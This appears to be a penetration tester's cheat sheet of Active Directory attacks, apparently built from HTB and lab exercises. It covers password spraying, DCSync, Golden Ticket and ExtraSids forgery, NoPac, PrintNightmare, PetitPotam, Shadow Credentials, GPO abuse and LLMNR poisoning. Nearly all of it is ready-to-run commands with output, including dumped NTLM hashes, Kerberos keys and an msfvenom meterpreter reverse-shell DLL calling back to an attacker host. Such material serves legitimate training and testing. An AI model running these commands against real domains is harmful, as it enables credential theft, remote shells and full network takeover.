Common Attacks

Enumerate Password Policy

#Enumerate Password policy
Intrusionz3r0X@htb[/htb]$ nxc smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Intrusionz3r0X@htb[/htb]$ enum4linux -P 172.16.5.5
Intrusionz3r0X@htb[/htb]$ enum4linux-ng -P 172.16.5.5 -oA ilfreight #Best Option
Intrusionz3r0X@htb[/htb]$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

#CMD
C:\htb> net accounts

#Powerview
PS C:\\htb> import-module .\\PowerView.ps1
PS C:\\htb> Get-DomainPolicy

Password Spraying

Crackmapexec: Pay attention to Bad-Pwd-Count value since this indicates the number of times the user tried to log on to the account using an incorrect password. Remember that we should run one, max two, password spraying attempts and wait over an hour between attempts.

#Interal Password Spraying (Linux)
Intrusionz3r0X@htb[/htb]$ for u in $(cat valid_ad_users);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 172.16.5.5 -u valid_ad_users -p Password123 --continue-on-success
Intrusionz3r0X@htb[/htb]$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

#Local admin Password Spraying
#Make sure **-local-auth** flag is set so we don't potentially lock out the built-in administrator for the domain
Intrusionz3r0X@htb[/htb]$ sudo crackmapexec smb **--local-auth** 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf --continue-on-success

#Internal Password Spraying - from Windows
PS C:\\htb> Import-Module .\\DomainPasswordSpray.ps1
PS C:\\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
PS C:\\htb> Invoke-DomainPasswordSpray -UserList <users> -Domain <domain-name> -PasswordList <password> -OutFile sprayed-creds.txt

GitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!GitHub

RID Cycling Attack

Intrusionz3r0X@htb[/htb]$ nxc smb 10.10.11.236  -u 'dfsdfs' -p '' --rid-brute
Intrusionz3r0X@htb[/htb]$ impacket-lookupsid dsdfsdfs@manager.htb -no-pass

DCSync Attack

If If you get the NT Domain Control Computer Account, you can perform the attack.

To perform this attack our compromised user must have the next ACLs attached

• DS-Replication-Get-Changes-All

• DS-Replication-Get-Changes

#View user Group Membership
PS C:\htb> Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

# Check user Replication Rights
PS C:\htb> $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
PS C:\htb> Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
PS C:\htb> Get-ObjectAcl -DistinguishedName "dc=example,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

#Extracting NTLM Hashes and Kerberos Keys Using secretsdump.py
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

#Extract NTLM for a specific user by DCSYNC attack
.\\mimikatz.exe privilege::debug "lsadump::dcsync /user:inlanefreight\\krbtgt" exit
.\\mimikatz.exe privilege::debug "lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\\Administrator" exit

Reversible Encryption Enabled

When this option is set on a user account, windows store the credentials using RC4 encryption and tools like secretsdump from impacket will decrypt any password stored using reversible encryption while dumping NTDS file.

#Enumerate user with Reversible Encryption Enabled
PS C:\\htb> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

DNS Poisoning to Capture NTLMv2 Hashes

If you discover an internal application (like a subdomain checker, as shown in the screenshot) that performs DNS lookups, and the compromised user has the ability to create machine accounts (i.e., MachineAccountQuota > 0), you can leverage this to coerce NTLMv2 authentication and capture hashes.

Checkig the MachineAccountQuota

❯ nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' -M maq
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
MAQ         10.10.65.121    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.65.121    389    DC               MachineAccountQuota: 10

Creating a fake computer

❯ impacket-addcomputer sendai.vl/Thomas.Powell:'Password123!' -computer-name z3r0 -computer-pass Password123! -dc-ip 10.10.65.121
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123!

Adding a malicious DNS

❯ python3 dnstool.py -u 'sendai.vl\z3r0$' -p 'Password123!' -r evil.sendai.vl -d 10.8.5.48 -a add dc.sendai.vl -dns-ip 10.10.65.121
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Wait between 8 - 10 minutes to the server is able to spread the new configuration.

Capturing the NTLMv2 hash

sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIF>
[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.65.121
[HTTP] NTLMv2 Username : SENDAI\websvc
[HTTP] NTLMv2 Hash     : websvc::SENDAI:521b32f46ea315bb:24C1C0CDFF3BB516F79639B3DA01AEE2:01010000000000001C4C3FD2F6A7DB010938B3C67A3ACFF600000000020008004D004E<SNIF>

ExtraSids Attack (SID History Injection Attack)

When you perform DCSync the parent domain use the flags /domain: /dc: <FQDN> /user: <DOMAINSID + USERID>

Requirenments:

• Child user KRBTGT

• Child Domain controler

• User: Administrator

• RID Child Domain

• Enterprise Admins RID Group

Enumeration on Windows

#Obtain the SID
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainSID

#Obtaining Enterprise Admins Group's SID using Get-DomainGroup
PS C:\\htb> Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL" #Powershell cmdlet
PS C:\\htb> Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid #Powerview

#DCSync attack
PS C:\\htb> .\\mimikatz.exe privilege::debug "lsadump::dcsync /user:INLANEFREIGHT\\lab_adm /domain:INLANEFREIGHT.LOCAL" exit

#Golden Ticket Attack
PS C:\\htb> .\\mimikatz.exe privilege::debug "kerberos::golden /krbtgt:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt" exit
PS C:\\htb>  .\\Rubeus.exe golden /rc4:<krbtgt-ntlm> /domain:<FQDN-Child-Domain> /sid:<SID-Child-Domain>  /sids:<SID-EnterpriseAdmin-Parent-Domain> /user:hacker /ptt

Enumeration on Linux

#Obtain SID of the Child Domain
Intrusionz3r0@htb[/htb]$ lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@10.129.229.159 | grep "Domain SID"

#Obtain SID of Enterprise Admins from Parent Domain
Intrusionz3r0@htb[/htb]$ proxychains lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@172.16.210.99 | grep -B12 "Enterprise Admins"

#Obtian NTLM or AesKey
DCSync Attack

Automatic via RaiseChild

Intrusionz3r0@htb[/htb]$ impacket-raiseChild lab.trusted.vl/cpowers -hashes :322db798a55f85f09b3d61b976a13c43 2>/dev/null

Manual from Windows

This will not work in a Winrm session! you can use RunasCS or Invoke-Command -computername localhost -credential $cred -ScriptBlock { REVERSESHELL }

PS C:\Users\Administrator\Documents> ./mimikatz.exe privilege::debug "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
User      : Administrator
Domain    : lab.trusted.vl (LAB)
SID       : S-1-5-21-2241985869-2159962460-1278545866
User Id   : 500
Groups Id : *513 512 520 518 519 
Extra SIDs: S-1-5-21-3576695518-347000760-3731839591-519 ; 
ServiceKey: c7a03c565c68c6fac5f8913fab576ebd - rc4_hmac_nt      
Lifetime  : 1/22/2025 12:51:16 AM ; 1/20/2035 12:51:16 AM ; 1/20/2035 12:51:16 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ lab.trusted.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x2efbeb

Cached Tickets: (1)

#0>	Client: Administrator @ lab.trusted.vl
	Server: krbtgt/lab.trusted.vl @ lab.trusted.vl
	KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
	Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent 
	Start Time: 1/22/2025 0:51:16 (local)
	End Time:   1/20/2035 0:51:16 (local)
	Renew Time: 1/20/2035 0:51:16 (local)
	Session Key Type: RSADSI RC4-HMAC(NT)
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 

PS C:\Users\Administrator\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500
[DC] 'trusted.vl' will be the domain
[DC] 'trusteddc.trusted.vl' will be the DC server
[DC] 'S-1-5-21-3576695518-347000760-3731839591-500' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 0: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 1: 86a9ee70dfd64d20992283dc5721b475
    lm  - 0: 1a28b083f0e83167bec07d185d492a67

<SNIF>

PS C:\Users\Administrator\Documents> 

Manual from Linux

impacket-ticketer -nthash c7a03c565c68c6fac5f8913fab576ebd -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 -user-id 500 Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lab.trusted.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

❯ KRB5CCNAME=Administrator.ccache impacket-secretsdump -k -no-pass @TRUSTEDDC.trusted.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
TRUSTEDDC$:1000:aad3b435b51404eeaad3b435b51404ee:33bf578b59ddf93c5d5a432744db5b18:::
LAB$:1103:aad3b435b51404eeaad3b435b51404ee:71efe1e8f79dbc400686157b8b6b378d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
Administrator:aes128-cts-hmac-sha1-96:1cee32af6e8cd27059d855e6c6b4d5ec
Administrator:des-cbc-md5:aed5e385512c685e
krbtgt:aes256-cts-hmac-sha1-96:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
krbtgt:aes128-cts-hmac-sha1-96:0c847e33f046419fec204e4187eeb1f4
krbtgt:des-cbc-md5:2943ad0131269702
TRUSTEDDC$:aes256-cts-hmac-sha1-96:c742159663525be9f3bcfcdd93b51d1afa635150b3935cc11653b8d6ded5d2e5
TRUSTEDDC$:aes128-cts-hmac-sha1-96:fad5815041bad051c72de3366f6ec83b
TRUSTEDDC$:des-cbc-md5:d3d35d2ce0982f6e
LAB$:aes256-cts-hmac-sha1-96:3e216f567145f88fec4e445171c7f2b5f12fb65d7b50b865079856782d79f108
LAB$:aes128-cts-hmac-sha1-96:5a6f0b23abcf1e23a5df45f578878167
LAB$:des-cbc-md5:1367e0b53762d0ba
[*] Cleaning up... 

New Windows Version

DC_ERR_TGT_REVOKED

The KDC_ERR_TGT_REVOKED error occurs because, starting with Windows update KB5008380, the KDC (Key Distribution Center) now checks if the user exists with the RID (user unique identifier). In order to perform an attack like ExtraSID and compromise the parent domain from the child, you need to generate a ticket for a real user with the correct RID. That is why you now need to use the -user-id and -aesKey parameters when creating the ticket, as mentioned, in order for the KDC check to pass successfully.

impacket-ticketer -aesKey 3bdcbeb0910e5887e6d6c1234567891e099322ac91cc386ca296a5c5497b0 -domain child.domain.local -domain-sid S-1-5-21-3056178012-397123859-491075245 -extra-sid S-1-5-221-2731230894-461713716-141835440-519 -user-id 500 Administrator  2>/dev/null

export KRB5CCNAME=Administrator.ccache

impacket-secretsdump -k -no-pass @FQDN -just-dc

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked) · Issue #1661 · fortra/impacketGitHub

fortra/impacketGitHub

Printer Bug

PS C:\\htb> Import-Module .\SecurityAssessment.ps1
PS C:\\htb> Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

ComputerName                        Status
------------                        ------
ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL   True

#Monitoring Tickets with Rubeus
PS C:\Tools> .\Rubeus.exe monitor /interval:5 /nowrap

#Abusing the Printer Bug
PS C:\Tools> .\SpoolSample.exe Target_Server Capture_Server

MS14-068

windows-kernel-exploits/MS14-068 at master · SecWiki/windows-kernel-exploitsGitHub

Group Policy Preferences (GPP) Passwords

#Retrieving GPP Passwords
Intrusionz3r0X@htb[/htb]$ gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
Intrusionz3r0X@htb[/htb]$ netexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

DNS Records When the naming convention is non-descriptive

Intrusionz3r0X@htb[/htb]$ adidnsdump -u inlanefreight\\\\forend ldap://172.16.5.5 -r

Intrusionz3r0X@htb[/htb]$ head records.csv 

type,name,value
?,LOGISTICS,?
AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691
AAAA,ForestDnsZones,dead:beef::231
A,ForestDnsZones,10.129.202.29
A,ForestDnsZones,172.16.5.240
A,ForestDnsZones,172.16.5.5
AAAA,DomainDnsZones,dead:beef::7442:c49d:e1d7:2691
AAAA,DomainDnsZones,dead:beef::231
A,DomainDnsZones,10.129.202.29

NoPac (SamAccountName Spoofing)

#Ensure everything is installed (NoPack and Impacket)
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/SecureAuthCorp/impacket.git
Intrusionz3r0X@htb[/htb]$ python setup.py install 
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/Ridter/noPac.git

#Scanning NoPac Vulnerability
Intrusionz3r0X@htb[/htb]$ sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
#Get a Administrator Shell
Intrusionz3r0X@htb[/htb]$ sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
#Perform to DCSyng Attack through NoPac
Intrusionz3r0X@htb[/htb]$ sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc
Intrusionz3r0X@htb[/htb]$ sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

PrinterNightmare

#Exploit by cube0x0
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/cube0x0/CVE-2021-1675.git

#Impacket Version
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

#Exploit vulnerability
Intrusionz3r0X@htb[/htb]$ rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR' #Check if is vulnerable and the services are exposed
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
Intrusionz3r0X@htb[/htb]$ sudo smbserver.py -smb2support CompData /path/to/backupscript.dll
msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 172.16.5.225
msf> set LPORT 8080
msf> run
Intrusionz3r0X@htb[/htb]$ sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\\\172.16.5.225\\CompData\\backupscript.dll'

PetitPotam (MS-EFSRPC)

https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-Petitpotam.ps1

Intrusionz3r0X@htb[/htb]$ sudo ntlmrelayx.py -debug -smb2support --target <http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp> --adcs --template DomainController

#Running PetitPotam
Intrusionz3r0X@htb[/htb]$ python3 PetitPotam.py 172.16.5.225 172.16.5.5   
mimikatz privilege::debug "misc::efs /server:<Domain Controller> /connect:<ATTACK HOST>" exit

#Submitting a TGS Request for Ourselves Using getnthash.py
Intrusionz3r0X@htb[/htb]$ python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\\$ -pfx-base64 <base64> dc01.ccache
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=dc01.ccache
Intrusionz3r0X@htb[/htb]$ secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Shadow Credentials

If your user possesses WriteDACL or AddKeyCredentialLink over any user or computer account you can write the attribute msDS-KeyCredentialLink to make the object vulnerable to Shadow Credentials

Linux

Using Pywhister

Intrusionz3r0X@htb[/htb]$ python3 pywhisker.py -d "DOMAIN.LOCAL" -u "COMPROMISEDUSER" -p 'PASSWORD123!' --target "COMPUTERNAME$" --action "add"
<SNIF>
[+] Saved PFX (#PKCS12) certificate & key at path: dGRWm33G.pfx
[*] Must be used with password: e0oMDaDQWXsaGrZZTXnz

Intrusionz3r0X@htb[/htb]$ python gettgtpkinit.py -cert-pfx dGRWm33G.pfx -pfx-pass 'e0oMDaDQWXsaGrZZTXnz' 'DOMAIN.LOCAL/COMPUTERNAME$' data.ccache
#2025-01-05 18:30:39,784 minikerberos INFO     59cc9737388ac8d9a15e68d53eeeeb6088212099a0d6aade1b15ce2223fdfb6e

Intrusionz3r0X@htb[/htb]$ KRB5CCNAME=data.ccache python getnthash.py -key '59cc9737388ac8d9a15e68d53eeeeb6088212099a0d6aade1b15ce2223fdfb6e' 'DOMAIN.LOCAL/COMPUTERNAME$'

GitHub - ShutdownRepo/pywhisker: Python version of the C# tool for "Shadow Credentials" attacksGitHub

Using Certipy-ad

Intrusionz3r0X@htb[/htb]$ certipy-ad shadow -u compromised_user -p 'password' -dc-ip x.xx.1x.xx -account target_user auto

Windows

#Writing msDS-KeyCredentialLink attribute to target
PS C:\Tools> .\Whisker.exe add /target:DC01$ /domain:inlanefreight.ad
#Requesting Ticket Granting Ticket
PS C:\Tools> .\Rubeus.exe asktgt /user:DC01$ /certificate:MIIJuAIBA<SNIP>" /password:<Passwod> /domain:inlanefreight.ad /dc:DC01.INLANEFREIGHT.AD /getcredentials /show

GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.GitHub

GPO-Based Privilege Escalation to Domain Compromise

If you identify that a user possesses GenericAll permissions over Default Domain Policy or Default Domain Controllers Policy, you can abuse Group Policy Objects (GPOs) to escalate privileges within the domain.

This scenario allows you to create a scheduled task (or perform other privileged actions) that will be executed on domain-joined machines, including Domain Controllers.

#Obtain GPO-ID
PS C:\temp> Get-GPO -all

#GPO Abuse tool
❯ python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -dc-ip 10.10.68.84 -gpo-id '6ac1786c-016f-11d2-945f-00c04fb984f9'
SUCCESS:root:ScheduledTask TASK_5cdfc77f created!
[+] ScheduledTask TASK_5cdfc77f created!

#Update the GPO's
PS C:\temp> Gpupdate /force

Pre-Windows 2000 computer account

In Active Directory, when administrators create computer accounts with the "Assign this computer account as a pre-Windows 2000 computer" option enabled, the system sets the account's password to the computer's name in lowercase. For example, a computer account named "BANKING$" would have a default password of "banking"

❯ nxc smb 10.10.105.102 -u BANKING$  -p banking
SMB         10.10.105.102   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.105.102   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

❯ impacket-changepasswd retro.vl/'BANKING$':'banking'@10.10.105.102 -p rpc-samr

LLMNR/NBT-NS Poisoning

#Responser tool (Linux)
# Hashes are saved on /usr/share/responder/logs
Intrusionz3r0X@htb[/htb]$ sudo responder -I <interface>

#Inveigh tool (Windows)
PS C:\\htb> Import-Module .\\Inveigh.ps1
PS C:\\htb> (Get-Command Invoke-Inveigh).Parameters
PS C:\\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

#Press ESC to enter/exit interactive console.
#HELP
#GET NTLMV2UNIQUE (get only the NTLMv2 hashes)
#GET NTLMV2USERNAMES (Get only the usernames)
PS C:\\htb> .\\Inveigh.exe
Press ESC to enter/exit interactive console

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

Places of Interest in Stealing NetNTLM Hashes | 🔐Blog of Osanda🔐Blog of Osanda